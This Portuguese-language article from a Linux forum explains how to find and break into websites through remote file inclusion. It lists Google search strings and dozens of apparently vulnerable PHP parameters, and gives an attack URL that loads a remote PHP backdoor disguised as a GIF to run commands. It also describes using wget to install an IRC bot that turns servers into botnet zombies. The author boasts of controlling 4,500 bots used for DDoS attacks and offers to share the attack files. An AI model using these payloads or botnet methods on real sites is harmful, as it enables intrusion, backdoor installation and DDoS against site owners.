Explorando vulnerabilidades em websites

Publicado por Vinícius de Oliveira Almeida em 20/09/2010

[ Hits: 28.006 ]

 


Explorando vulnerabilidades em websites



Procurando hosts vulneráveis

A maioria dos crackers utilizam script kiddies (script prontos), aproveitam a ferramenta de pesquisa Google para buscar strings vulneráveis. Existem alguns scanners feitos em Delphi disponíveis na internet que consultam strings diretamente no resultado de pesquisa de sites como Google, Aonde, UOL etc. Após o resultado ser exibido no sistema, o cracker aplica o exploit na lista gerada, efetuando um ataque em massa.

Algumas técnicas são utilizadas diretamente pelo Google como por exemplo:

allinurl: admin?id=

Os hosts mais vulneráveis são sistemas de código fonte aberto, como Joomla, PHP-Nuke, Wordpress etc. Por isso é bacana sempre manter estes aplicativos atualizados, evitando um possível ataque.

Muitos perguntam porque na maioria dos ataques os principais aplicativos afetados são de open source. Logo digo, uma vez que temos acesso a todos os fontes do aplicativo, devido ao amplo conhecimento em programação acharemos falhas.

Strings conhecidas

Algumas strings bastante conhecidas pelos crackers, dificilmente acharemos algum site vulnerável com estas strings, mas vale a pena verificar:

./modules/mod_mainmenu.php?mosConfig_absolute_path=
./include/new-visitor.inc.php?lvc_include_dir=
./path_of_cpcommerce/_functions.php?prefix
./modules/My_eGallery/public/displayCategory.php?basepath=
./modules/4nAlbum/public/displayCategory.php?basepath=
./modules/coppermine/themes/default/theme.php?THEME_DIR=
./modules/agendax/addevent.inc.php?agendax_path=
./shoutbox/expanded.php?conf=
./modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
./pivot/modules/module_db.php?pivot_path=
./library/editor/editor.php?root=
./library/lib.php?root=
./e107/e107_handlers/secure_img_render.php?p=
./main.php?x=
./index.php/main.php?x=
./index.php?include=
./index.php?x=
./index.php?open=
./index.php?visualizar=
./template.php?pagina=
./index.php?pagina=
./index.php?inc=
./index.php?leng=
./index.php?page=
./index.php?rev=
./index.php?main=
./index.php?show=
./index.php?x=
./index.php?inc=
./index.php?menu=
./index.php?aktie=
./index.php?s=
./index.php?p=
./index.php?principal=
./index.php?url=
./index.php?file=
./index.php?do=
./index.php?side=
./index.php?f=
./index.php?display=
./index.php?webpage=
./index.php?content=
./index.php?source=
./index.php?texto=
./index.php?go=
./index.php?contents=
./index.php?meio=
./index.php?miolo=
./index.php?section=
./index.php?configFile=
./index.php?op=
./index.php?id=
./index.php?corpo=
./index.php?article=
./index.php?Itemid=
./index.php?product_id=
./index.php?lang=
./index.php?showtopic=
./index.php?option=
./index.php?link=
./index.php?module=
./index.php?submenu=
./index.php?cat=
./index.php?visualizar=
./index.php?open=
./index.php?include=
./main.php?page=
./main.php?file=
./main.php?ver=
./main.php?dir=
./main.php?side=
./main.php?doc=
./main.php?x=
./main.php?lk=
./main.php?pbody=
./main.php?menu=
./main.php?op=

Atacando alvo exemplo

Uma vez tendo uma string vulnerável ao nosso scanner, darei um exemplo conhecido de um cmd em formato gif:

http://www.exemplo.org/index.php?site=http://www.site_onde_a_cmd.gif_ta.com/cmd.gif?&cmd=id

Veja o link acima e analise que chamamos uma URL remota para execução do nosso gif, em que na verdade o conteúdo deste gif possui códigos em PHP para um backdoor embutido no gif, permitindo que o cracker tenha acesso do sistema pelo usuário do Apache.

Por isso é bom lembrar, não rodem o Apache como root, pois se algum dia sua aplicação for vulnerável o atacante ficará restrito no id do usuário, não prejudicando tanto seu servidor.

Para curiosos, posso passar todos os arquivos por e-mail ou MSN.

MSN: [email protected]
E-mail: [email protected]com

Continuando:

Observe que no final da string temos o comando id. Interessante não é, após a execução desta URL o exploit irá rodar e na tela no browser teremos uma tela para gerenciamento do bash alvo e o resultado do comando id.

Alguns crackers executam outros backdoors através desta string, um exemplo é tornar o alvo zombie do atacante fazendo conexões reversas em servidores de IRC. Como exemplo utilizaremos o PBOT.php.

O atacante coloca na URL um wget baixando o pbot.php, sendo que neste pbot o servidor irá conectar-se remotamente em uma sala de IRC administrado pelo cracker, tornando-se um zombie na espera de um comando..

Uma vez o servidor estando conectado na servidor do IRC, o cracker pode administrar vários alvos ao mesmo tempo, podendo criar ataque em massa chamado botnet.

Conclusão

Eu mesmo utilizo parte desta técnica, pois as strings comentadas neste tutorial são antigas. Atualmente tenho 4.500 bots em meu domínio. Não utilizo esses bots para hacker páginas e danificar sistemas. Utilizo para testes de análise de segurança, ataque DDOS e quebra de criptografias.

O alvo atacado não identifica seu endereço IP, pois quem faz o ataque são os botnet e não você.

Brevemente estarei criando outro artigo explicando como se defender de ataques botnets.

Provo para vocês que muitos sites conhecidos estão vulneráveis a este tipo de ataque.

Caso queira testar seu site, mande um comentário com seu domínio ou me adicione no MSN [email protected]

Att
Vinicius
IDEA

Outras dicas deste autor

Sincronizando senhas de e-mail com Myauth 3

Instalando Tcptrack no Slackware 13

Dúvidas para compilar um kernel?

PHP com suporte a Oracle no Slackware 10

Instalando placa de rede Agere Systems ET131x PCI-E no Linux

Leitura recomendada

Instalando o software de visualização 2-D e 3-D VisIt no Ubuntu-8.04

Instalação do Jboss no Fedora 8 Linux

Instalação do driver da placa wireless Broadcom/bcm4312 no Debian 6.0

Habilitando Apt-get no Damn Small Linux (DSL)

Configuração de internet móvel 3G CTBC no Ubuntu

  

Comentários
[1] Comentário enviado por fabioqyz em 12/11/2013 - 21:09h

Vinicius,

O site do meu cliente foi invadido, o sujeito conseguiu acessar o admin do site e postou isso em uma das páginas:
Segue link: http://www.welmomoura.com.br/site/pagina_hackeada.html">http://www.welmomoura.com.br/site/pagina_hackeada.html

O link para o admin do site estava explícito na página na ocasião, mas já alterei as senhas e renomeei a pasta do admin.

Poderia verificar pra mim as vulnerabilidades desse site? http://www.welmomoura.com.br/site/

At. Fábio



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts